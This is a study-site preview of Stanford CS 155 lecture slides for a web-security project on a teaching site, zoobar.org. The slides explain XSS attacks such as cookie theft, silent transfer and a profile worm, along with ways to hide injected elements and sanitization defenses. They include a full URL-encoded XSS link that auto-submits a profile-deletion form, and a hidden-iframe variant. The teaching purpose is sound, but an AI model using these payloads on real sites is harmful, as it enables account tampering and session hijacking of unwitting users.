New version page

Stanford CS 155 - Web App Security

Documents in this Course
Lecture 5

Lecture 5

64 pages

Phishing

Phishing

31 pages

Load more
Upgrade to remove ads

This preview shows page 1-2-3-27-28-29 out of 29 pages.

Save
View Full Document
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 29 pages.
Access to all documents
Download any document
Ad free experience

Upgrade to remove ads
Unformatted text preview:

Project 2: Web App SecurityDeadlinesPart 1OverviewAttacksJavaScriptInvoking JavaScriptDOM Manipulation ExamplesArrays and LoopsOther Useful FunctionsStealthy StylesExample: Profile DeleterFind vulnerabilityCopy form dataURL encodeDebuggingFixed versionFinal TestStealthier approachesPart 2GoalsPHP: Hypertext PreprocessorSQLFile structuretxt-db-apiDefenses to Part 1Sanitization TechniquesMore XSS huntingGood luck!1Project 2: Web App SecurityCollin JacksonCS 155Spring 20062Deadlines3Part 1Attacks4Overview•Explore severalattack types•Requires botheffectiveness and stealthLearn:•How an attacker can evade sanitization•Consequences of an exploit•JavaScript•Very basic CSS5Attack A: Cookie TheftUse URL encodingCould hijack sessionAttack C: Login SnoopingEvade sanitizationHandle DOM eventsemailAttacks Attack B: Silent TransferNavigate browserUse iframes, formsAttack D: Profile WormConfuse site scriptsReplicatezoobar.orglinkemailzoobar.orgformbadguy.comstanford.eduredirectbadguy.comzoobar.orgformzoobar.org6JavaScriptBrowser scripting language with C-like syntaxSandboxed, garbage collectedClosuresvar x = 3; var y = function() { alert(x); }; return y;Encapsulation/objectsfunction X() { this.y = 3; } var z = new X(); alert(z.y);Can interpret data as code (eval)Browser-dependent7Invoking JavaScriptTags: <script>alert( ‘Hello world!’ )</script>Links: javascript:alert( ‘Hello world!’ )Wrap code in “void” if it has return valueEvent handlers: <form onsubmit=“alert( ‘Hello world!’ )”><iframe onload=“alert( ‘Hello world!’ )”>CSS (IE only)<style>body { background: url(javascript:alert( ‘Hello world!’ )); }</style>8DOM Manipulation Examplesdocument.getElementByID(id)document.getElementsByTagName(tag)document.write(htmltext)document.createElement(tagname)document.body.appendChild(node)document.forms[index].fieldname.value = …document.formname.fieldname.value = …frame.contentDocument.getElementById(id)9Arrays and LoopsExample: Change href of all links on a pagevar links = document.getElementsByTagName(‘a’);for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = “javascript:alert(‘Sorry!’);”;}10Other Useful FunctionsNavigationdocument.locationdocument.formname.submit()document.forms[0].submitfield.click()Delayed Eventsnode.addEventListener(eventname, handler, useCapture)node.removeEventListener(eventname, handler, useCapture)window.setTimeout(handler, milliseconds)11Stealthy Stylesvar node = document.getElementByID(“mynodeid”);node.style.display = ‘none’; // may not load at allnode.style.visibility = ‘hidden’; // still takes up space node.style.position = ‘absolute’; // not included in flowdocument.write( // can also write CSS rules to page“<style>#mynodeid { visibility:hidden; }</style>”);12Example: Profile DeleterMalicious hyperlink deletes profile of user who clicks itOnly works when user logged inUser might have multiple tabs openMight have chosen/forgotten not to log outMight appear in another user’s profileUses vulnerability in users.php from Attack AConstructs profile deletion form and submits it???13Find vulnerabilitySite reflectsquery parameter in input fieldLink can includeanything wewant here14Copy form dataView sourceto find formfieldsCreate copycat form with ourmodifications15Close previous<input>,<form>Buttonclick triggersform submitURL encode16DebuggingCheck errorIt didn’t work.Open JavaScriptconsoleUndefined No properties!Two formswith same name17Now withcorrectformFixed version18Profile deletedFinal Testusers.phpreplacedwith index.phphttp://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E19Post form into hidden iframe <form name=F action=/index.php target=myframe>…<iframe name=myframe style=“visibility:hidden”>…Open page with form in hidden iframe<iframe name=myframe style=“visibility:hidden”>…<script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>Stealthier approaches20Part 2Defenses21GoalsLearn:•How easy it is to make mistakes•That even simple code can be hard to secure•Techniques for appropriate input validation•PHP•Very basic SQLLittle programming knowledge can be a dangerous thing22PHP: Hypertext Preprocessor Server scripting language with C-like syntaxCan intermingle static HTML and code<input value=<?php echo $myvalue; ?>>Encapsulation/objectsclass X { var $y = 3; } $z = new X(); echo $z->y; Can embed variables in double-quote strings$user = “world”; echo “Hello $user!”;or $user = “world”; echo “Hello” . $user . “!”;Form data in global arrays $_GET, $_POST, …23SQLWidely used database query languageFetch a set of recordsSELECT * FROM Person WHERE Username=‘grader’Add data to the tableINSERT INTO Person (Username, Zoobars) VALUES (‘grader’, 10)Modify dataUPDATE Person SET Zoobars=42 WHERE PersonID=5Query syntax (mostly) independent of vendor24File structureindex.php users.phptransfer.phplogin.phpincludes/auth.php (cookie authentication)common.php (includes everything else)navigation.php (site template)db/zoobar/Person.txt (must be writable by web server)Includes /usr/class/cs155/projects/pp2/txt-db-api/…Only edit these files25txt-db-apiThird-party text file database libraryData can be int, string, and autoincrementNeed to escape strings: \’ \” \\Actually magic_quotes_gpc does this for us$recipient = $_POST[‘recipient’]; // already escaped$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql);if( $rs->next() )$id = $rs->getCurrentValueByName(‘PersonID’);26Attack A: Cookie TheftAttack C: Login SnoopingDefenses to Part 1 Attack B: Silent TransferAttack D: Profile Worm27Sanitization Techniquesaddslashes(string)Already done by magic_quotes_gpcInverse: stripslashes(string)htmlspecialchars(string [, quote_style])Converts & < > ” to HTML entitiesUse ENT_QUOTES to change ’ to &#039; strip_tags(string, [, allowable_tags])Max tag length 1024Does not sanitize tag


View Full Document
Download Web App Security
Our administrator received your request to download this document. We will send you the file to your email shortly.
Loading Unlocking...
Login

Join to view Web App Security and access 3M+ class-specific study document.

or
We will never post anything without your permission.
Don't have an account?
Sign Up

Join to view Web App Security 2 2 and access 3M+ class-specific study document.

or

By creating an account you agree to our Privacy Policy and Terms Of Use

Already a member?